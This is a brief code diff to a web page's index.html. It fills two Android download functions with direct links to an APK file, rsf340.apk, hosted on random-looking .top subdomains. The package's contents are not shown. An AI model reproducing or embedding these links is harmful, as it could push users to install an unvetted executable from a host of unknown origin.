--- a/index.html
+++ b/index.html
@@ -223,11 +223,11 @@
 
     function androidDownload() {
         var winRef = window.open("", "_self");
-        winRef.location = '';//android包的地址
+        winRef.location = 'http://cbhafbdhcgbaduyhvba7.678876.top/rsf340.apk';//android包的地址
     }
     function androidDownload2() {
         var winRef = window.open("", "_self");
-        winRef.location = '';//android包的地址
+        winRef.location = 'http://fhnubva6.hy7883.top/rsf340.apk';//android包的地址
     }    
 </script>
 
